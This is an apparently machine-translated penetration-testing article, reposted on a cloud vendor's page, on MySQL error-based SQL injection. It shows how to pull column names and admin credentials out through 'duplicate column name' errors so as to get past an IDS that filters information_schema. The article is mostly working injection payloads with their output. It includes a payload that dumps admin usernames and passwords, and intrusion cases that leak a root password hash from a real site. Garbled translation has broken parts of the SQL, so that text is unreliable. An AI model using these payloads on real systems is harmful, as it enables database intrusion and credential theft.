Attackers can bypass IDS to filter information_schema and continue the injection.

Source: Internet
Author: User
Tags mysql create mysql insert mysql create table

Original article: bypassing ids to filter information_schema continuous perfusion

 
// Use mysql to expose fields with errors
 
Mysql select * from (select * from user ajoin user B) c;
 
Error 1060 (42s21): duplicate column namehost
 
Mysql select * from (select * from user ajoin user busing (host) c;
 
Error 1060 (42s21): duplicate column nameuser
 
Mysql select * from (select * from user ajoin user busing (host, user) c;
 
Error 1060 (42s21): duplicate column namepassword
 
.
 
// Obtain information
 
// It may be a version problem. I cannot test it successfully.
 
Mysql select name_const (select host from user limit 0, 1), 0 );
 
Error 1210 (hy000): incorrect arguments to name_const
 
It seems that the name_const parameter must be the same as the const parameter.
 
Try again next time.
 
Update: it is clearly a version problem (the parameters in the higher version are all const, or an error is reported). the versatility of this method does not seem very good.
 
Mysql select version ();
 
+ --- +
 
| Version () |
 
+ --- +
 
| 5.0.27-community-nt |
 
+ --- +
 
1 row in set (0.00 sec)
 
Mysql select name_const (select user (), 0 );
 
+ -- +
 
| Root @ localhost |
 
+ -- +
 
| 0 |
 
+ -- +
 
1 row in set (0.00 sec)
 
---
 
Mysql select version ();
 
+ -- +
 
| Version () |
 
+ -- +
 
| 5.1.35-community |
 
+ -- +
 
1 row in set (0.00 sec)
 
Mysql select name_const (select version (), 0 );
 
Error 1210 (hy000): incorrect arguments to name_const
 
When I was doing penetration, I met a website where ids filtered information_schema. As a result, I failed to solve the problem later. I read the article the day before and found a bypass method. I tested it locally, I also discussed the monthly meeting, and finally constructed the statements with the help of the monthly meeting. At that point, I went back and looked at them, later, when my brother released the method, let's publish it.
 
1. Construct a local test table
 
Mysql create table users (id int, name varchar (20), passwd varchar (32 ));
 
Query OK, 0 rows affected (0.04 sec)
 
Mysql insert into users value (1, mickey, 827ccb0eea8a706c4c34a16891f84e7b );
 
Query OK, 1 row affected (0.00 sec)
 
Mysql create table news (is_admin int (1), id int (2), title varchar (100), date );
 
Query OK, 0 rows affected (0.00 sec)
 
Mysql insert into news values (1, 1, hello, mickey, now ());
 
Query OK, 1 row affected, 1 warning (0.00 sec)
 
2. Violent column names
 
Mysql select * from (select * from users as ajoin news as B) as c;
 
Error 1060 (42s21): duplicate column nameid
 
Mysql select * from (select * from users ajoin users busing (id) c;
 
Error 1060 (42s21): duplicate column namename
 
Mysql select * from (select * from users ajoin users busing (id, name) c;
 
Error 1060 (42s21): duplicate column namepasswd
 
Mysql select * from (select * from users ajoin users busing (id, name, passwd) c;
 
+ -- + --- + ---- +
 
| Id | name | passwd |
 
+ -- + --- + ---- +
 
| 1 | mickey | 827ccb0eea8a706c4c34a16891f84e7b |
 
+ -- + --- + ---- +
 
1 row in set (0.00 sec)
 
Mysql select * from (select * from news ajoin news busing (id) as c;
 
Error 1060 (42s21): duplicate column nameis_admin
 
Mysql select * from (select * from news ajoin news busing (id, is_admin) as c;
 
Error 1060 (42s21): duplicate column nametitle
 
Mysql select * from (select * from news ajoin news busing (id, is_admin, title) as c;
 
Error 1060 (42s21): duplicate column namedate
 
Mysql select * from (select * from news ajoin news busing (id, is_admin, title, date) as c;
 
+ ---- + -- + --- + -- +
 
| Is_admin | id | title | date |
 
+ ---- + -- + --- + -- +
 
| 1 | 1 | hello, mickey | 2010-05-08 |
 
+ ---- + -- + --- + -- +
 
1 row in set (0.00 sec)
 
3. brute force field value (this statement was created by yuanniu)
 
Violent statements
 
Select * from cms_votes where vid = 1 and exists
(Select * from (select name_const (select group_concat (concat (uid, 0x7c, pwd) from admin)
 
, Fuck) a join (select name_const (select group_concat (concat (uid, 0x7c, pwd) from admin), fuck) B) c );
 
Application:
 
Mysql select * from cms_votes where vid = 1 and exists
 
(Select * from (select name_const (
 
(Select group_concat (concat (uid, 0x7c, pwd) from admin), fuck) a join (select name_const (select group_concat (concat (uid, 0x7c, pwd )) fromadmin ),
 
Fuck) B) c );
 
Error 1060 (42s21): duplicate column nameylbhz | fuck, mickey | fucked
 
Mysql select * from cms_votes where vid = 1 and exists
 
(Select * from (select name_const (@ version, 0 ))
 
A join (select name_const (@ version, 0) B) c );
 
Error 1060 (42s21): duplicate column name5.0.45-community-nt
 
4. Actual intrusion Cases
 
Column name5.0.27-community-nterror: duplicate column name5.0.27-community-nt
 
Column nameroot * b7b1a4f45d9e638faeb750f0a 99935634cff6c82 ′
 
Error: duplicate column nameroot * b7b1a4f45d9e638faeb750f0a 99935634cff6c82 ′
 
Finally, I would like to thank Mo NIU for guiding the participants.
 

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.